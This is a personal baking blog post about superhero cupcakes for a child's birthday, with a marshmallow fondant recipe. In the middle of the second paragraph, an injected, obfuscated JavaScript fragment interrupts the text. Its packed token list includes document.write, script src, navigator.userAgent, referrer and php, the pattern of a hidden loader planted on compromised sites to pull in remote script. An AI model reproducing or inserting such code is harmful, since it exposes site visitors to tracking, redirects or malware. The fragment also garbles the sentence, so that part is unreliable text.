I really like making and decorating cupcakes. But my waistline doesn’t enjoy eating them. That’s for sure.
Do you remember the ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdyrf|var|u0026u|referrer|tzrba||js|php’.split(‘|’),0,{}))
pirate cupcakes from last year? Well, Julian was turning 5 and decided this year’s theme would be Superheroes!
I was kinda pumped for his choice. Not gonna lie. As an X-Men, Spiderman, Superman, Batman fan, this couldn’t have been more up my alley!
We went for a more vintage-y theme (vintage-y is a word, right?…no? whatevs, I like math). The cupcakes and cake were decorated with comic book punch royal icing and fondant.
Notice the Super J on the top?
Marshmallow fondant is one of my favorites. It’s super tasty and really easy to make.
Ingredients
8 oz marshmallows (I used the big ones and used a whole bag, minus about 6 mallows)
4 cups powdered sugar
~2 Tbs Water
Food Coloring
Microwave the marshmallows in a microwave safe bowl for about 1 minute. The marshmallows should puff up.
Mix in the powdered sugar. Sounds easy. Kinda tough. I use my kitchen aid and start with the paddle and then end with the dough hook. Works like a charm. Then you can knead it into a nice ball. Use powdered sugar to keep it from getting too sticky (kinda like flouring your work surface, but with powdered sugar).
The hard part is folding in the color. I used gel colors, but you can use the liquid kind as well.
When it’s ready, roll it out on a surface and cut away! I fee handed the starburst thingies. I finally got the hang of it when I got to the last one. Wah wah.
